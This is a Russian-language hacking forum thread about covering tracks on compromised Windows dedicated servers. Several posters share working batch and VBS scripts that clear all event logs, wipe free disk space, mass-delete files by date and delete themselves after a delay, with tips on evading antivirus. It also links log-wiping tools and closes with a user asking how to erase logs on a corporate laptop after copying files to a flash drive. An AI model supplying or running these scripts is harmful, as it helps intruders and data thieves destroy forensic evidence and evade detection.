-
Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе
Универсальных программ под все нужды не существует. Ручками это делать приходится в большинстве случаев.
Запомни одно золотое правило "логирование" соединений, каких либо происходящих процессов в системе. Закладывается туда фундаментально, то есть дефолтная программная функция, как и процесс. Поэтому даже если ты зачистишь за собой как следует, это не спасет тебя в случае если трафик будет анализировать опытный эксперт. Обычно если это дедик туда наливают внешний трафик, раздают или отдают нерадивым которые еще не совсем осознают весь риск пользоваться чем то публичным.
Вообще в зависимости от ситуации иногда левого трафика не нагонишь, приходится, скидывать до дефолтных настроек оборудование, или приводить в не профпригодность. Зависит от конкретного оборудования и случая.
Как сказано выше нужно ручками себе скрипт накидывать под конкретные задачи, можно такой батник заюзать
Чистит полностью журнал, после очистки трет в 3 прохода свободное место.
Можно поиграть с расширениями логов которые пишут сторонние софты .bac, .log, .tmp и т.д
Код:
@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
cipher /w:C:\
del %0
:do_clear
echo clearing %1
wevtutil.exe cl %1
goto :eof
:noAdmin
del %0
exitЧистит полностью журнал, после очистки трет в 3 прохода свободное место.
Можно поиграть с расширениями логов которые пишут сторонние софты .bac, .log, .tmp и т.д
Код:
for /d %%i in (C:\*) do start /b cmd /c (del "%%i\*.log")
Последнее редактирование:
Естественно, для дедиков Windows.
На русскоязычной версии Окон работает отлично. Можно запустить батник и отключиться от дедика. Батник самоликвидируется.
+ в начале задержку поставить нужно
Например будет
Запускаем скрыто
run.vbs
Код:
Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Run("run.cmd"), 0, Truerun.bat
Код:
PING -n 30 -w 10 127.0.0.1 > nul
del hide.vbs
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
cipher /w:C:\
del %0
:do_clear
echo clearing %1
wevtutil.exe cl %1
goto :eof
:noAdmin
del %0
exitсчитает 30 сек и выполняется
30 сек хватит отконектится от дедика скрытый режим нужно чтобы при затирание логов окно cmd не моячило ибо затирание свободного места процедура не быстрая
Последнее редактирование:
А, вот ещё вариант батника для чистки логов на дедиках Windows.
Я этим пользуюсь.
Я этим пользуюсь.
Код:
@echo off
timeout /T 60
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo Event Logs have been cleared!
goto theEnd
:do_clear
echo clearing %1
wevtutil.exe cl %1
goto :eof
:noAdmin
echo You must run this script as an Administrator!
echo.
:theEnd
rd /s /q %systemdrive%\$RECYCLE.BIN
del %0Ещё существует вот такая программа для чистки логов на дедиках Windows.
Правда, не всем она придётся по душе ): нет открытого исходного кода
Скачать:
Правда, не всем она придётся по душе ): нет открытого исходного кода
Скачать:
Ссылка скрыта от гостей
А ещё нашла у себя на HDD какую-то старую программулину для чистки логов.
Вот скриншот.
Программа древняя, предназначена была для работы в более ранних версиях Окон.
Яндекс-диск распознаёт в ней вирус.
Но какой-то вирус в ней вряд-ли имеется.
Я общалась на протяжении нескольких лет с её автором: он вряд-ли туда что-то запилил.
Ранее антивирусы были к этой пограмулине равнодушны, а сейчас что-то изменилось.
Качайте на свой страх и риск.
Пароль:
codeby.net
Вот скриншот.
Программа древняя, предназначена была для работы в более ранних версиях Окон.
Яндекс-диск распознаёт в ней вирус.
Но какой-то вирус в ней вряд-ли имеется.
Я общалась на протяжении нескольких лет с её автором: он вряд-ли туда что-то запилил.
Ранее антивирусы были к этой пограмулине равнодушны, а сейчас что-то изменилось.
Качайте на свой страх и риск.
Ссылка скрыта от гостей
Пароль:
codeby.net
Последнее редактирование модератором:
В топку школотулзы
Только юзайте аккуратно )
/D 15.04.2018 (удалит все файлы которые были созданы сегодня)
/d -1 (старше одного дня)
Ну и тд
Вывод измененных сегодня файлов удобно посмотреть куда могли наследить
Можно менять атрибуты, удалять, изменять дату создания, перезаписывать и т.д
Удобная тулза и антивирусы гавкать не будут )
forfiles.exe /p C:\ /s /m *.* /D 15.04.2018 /c "cmd /c del /q /f @file"Только юзайте аккуратно )
/D 15.04.2018 (удалит все файлы которые были созданы сегодня)
/d -1 (старше одного дня)
Ну и тд
Вывод измененных сегодня файлов удобно посмотреть куда могли наследить
Код:
forfiles.exe /p C:\ /s /m *.* /D 15.04.2018 /c "cmd /c echo @path @fdate >> "C:\Результат.txt"
notepad "C:\Результат.txt"
exitFORFILES [/P <путь>] [/M <маска_поиска>] [/S]
[/C <команда>] [/D [+ | -] {dd.MM.yyyy | dd}]
Описание.
Выбор файла (или набора файлов) и выполнение команды
с этим файлом. Программа полезна для пакетных заданий.
Параметры:
/P <путь> Путь, с которого начинается поиск.
По умолчанию используется текущая
рабочая папка (.).
/M <маска_поиска> Поиск файлов с помощью маски.
Маска поиска по умолчанию "*" .
/S Рекурсивное выполнение программы forfiles
во всех подпапках, аналогично "DIR /S".
/C <команда> Команда, которая выполняется для каждого файла.
Строки команд необходимо заключать в прямые
кавычки.
Команда по умолчанию "cmd /c echo @file".
Следующие переменные могут использоваться
в строке команды:
@file - возвращает имя файла.
@fname - возвращает имя файла без
расширения.
@Ext - возвращает только расширение имени
файла.
@path - возвращает полный путь к файлу.
@relpath - возвращает относительный путь к
файлу.
@isdir - возвращает значение "TRUE", если типом
файла является папка, и "FALSE" для файлов.
@fsize - возвращает размер файла
в байтах.
@fdate - возвращает дату последнего изменения
файла.
@ftime - возвращает время последнего изменения
файла.
Для включения специальных символов в строку команды
следует использовать шестнадцатеричный код символа
в формате 0xHH (например, 0x09 для табуляции).
Перед внутренними командами CMD.exe необходимо ставить
"cmd /c".
/D <дата> Выбор файлов, у которых дата последнего изменения
больше или равна (+) либо меньше или равна
(-) указанной дате при использовании формата
"dd.MM.yyyy"; либо файлов, у которых дата последнего
изменения больше или равна (+)
текущей дате плюс "dd" дней либо меньше или
равна (-) текущей дате минус "dd" дней.
Допустимым числом дней "dd" является любое
число в диапазоне 0 - 32768.
"+" используется по умолчанию, если знак не указан.
/? Вывод справки по использованию.
Примеры:
FORFILES /?
FORFILES
FORFILES /P C:\WINDOWS /S /M DNS*.*
FORFILES /S /M *.txt /C "cmd /c type @file | more"
FORFILES /P C:\ /S /M *.bat
FORFILES /D -30 /M *.exe
/C "cmd /c echo @path 0x09 был изменен 30 дней назад"
FORFILES /D 01.01.2001
/C "cmd /c echo @fname является новым с 1-янв-2001"
FORFILES /D +25.1.2011 /C "cmd /c echo @fname является новым сегодня"
FORFILES /M *.exe /D +1
FORFILES /S /M *.doc /C "cmd /c echo @fsize"
FORFILES /M *.txt /C "cmd /c if @isdir==FALSE notepad.exe @file"
[/C <команда>] [/D [+ | -] {dd.MM.yyyy | dd}]
Описание.
Выбор файла (или набора файлов) и выполнение команды
с этим файлом. Программа полезна для пакетных заданий.
Параметры:
/P <путь> Путь, с которого начинается поиск.
По умолчанию используется текущая
рабочая папка (.).
/M <маска_поиска> Поиск файлов с помощью маски.
Маска поиска по умолчанию "*" .
/S Рекурсивное выполнение программы forfiles
во всех подпапках, аналогично "DIR /S".
/C <команда> Команда, которая выполняется для каждого файла.
Строки команд необходимо заключать в прямые
кавычки.
Команда по умолчанию "cmd /c echo @file".
Следующие переменные могут использоваться
в строке команды:
@file - возвращает имя файла.
@fname - возвращает имя файла без
расширения.
@Ext - возвращает только расширение имени
файла.
@path - возвращает полный путь к файлу.
@relpath - возвращает относительный путь к
файлу.
@isdir - возвращает значение "TRUE", если типом
файла является папка, и "FALSE" для файлов.
@fsize - возвращает размер файла
в байтах.
@fdate - возвращает дату последнего изменения
файла.
@ftime - возвращает время последнего изменения
файла.
Для включения специальных символов в строку команды
следует использовать шестнадцатеричный код символа
в формате 0xHH (например, 0x09 для табуляции).
Перед внутренними командами CMD.exe необходимо ставить
"cmd /c".
/D <дата> Выбор файлов, у которых дата последнего изменения
больше или равна (+) либо меньше или равна
(-) указанной дате при использовании формата
"dd.MM.yyyy"; либо файлов, у которых дата последнего
изменения больше или равна (+)
текущей дате плюс "dd" дней либо меньше или
равна (-) текущей дате минус "dd" дней.
Допустимым числом дней "dd" является любое
число в диапазоне 0 - 32768.
"+" используется по умолчанию, если знак не указан.
/? Вывод справки по использованию.
Примеры:
FORFILES /?
FORFILES
FORFILES /P C:\WINDOWS /S /M DNS*.*
FORFILES /S /M *.txt /C "cmd /c type @file | more"
FORFILES /P C:\ /S /M *.bat
FORFILES /D -30 /M *.exe
/C "cmd /c echo @path 0x09 был изменен 30 дней назад"
FORFILES /D 01.01.2001
/C "cmd /c echo @fname является новым с 1-янв-2001"
FORFILES /D +25.1.2011 /C "cmd /c echo @fname является новым сегодня"
FORFILES /M *.exe /D +1
FORFILES /S /M *.doc /C "cmd /c echo @fsize"
FORFILES /M *.txt /C "cmd /c if @isdir==FALSE notepad.exe @file"
Можно менять атрибуты, удалять, изменять дату создания, перезаписывать и т.д
Удобная тулза и антивирусы гавкать не будут )
Последнее редактирование:
SearcherSlava
Red Team
Ссылка скрыта от гостей
Ссылка скрыта от гостей
Ссылка скрыта от гостей
Ссылка скрыта от гостей
Ссылка скрыта от гостей
Ссылка скрыта от гостей
Ссылка скрыта от гостей
Ссылка скрыта от гостей
Парни подскажите, пожалуйста, а можно ли затереть логи на корпоративном ноуте, без админского доступа, после того как файлы скопированы на флешку? Если да то, можно выше перечисленными батниками воспользоваться или другой какой вариант?
Обучение наступательной кибербезопасности в игровой форме. Начать игру!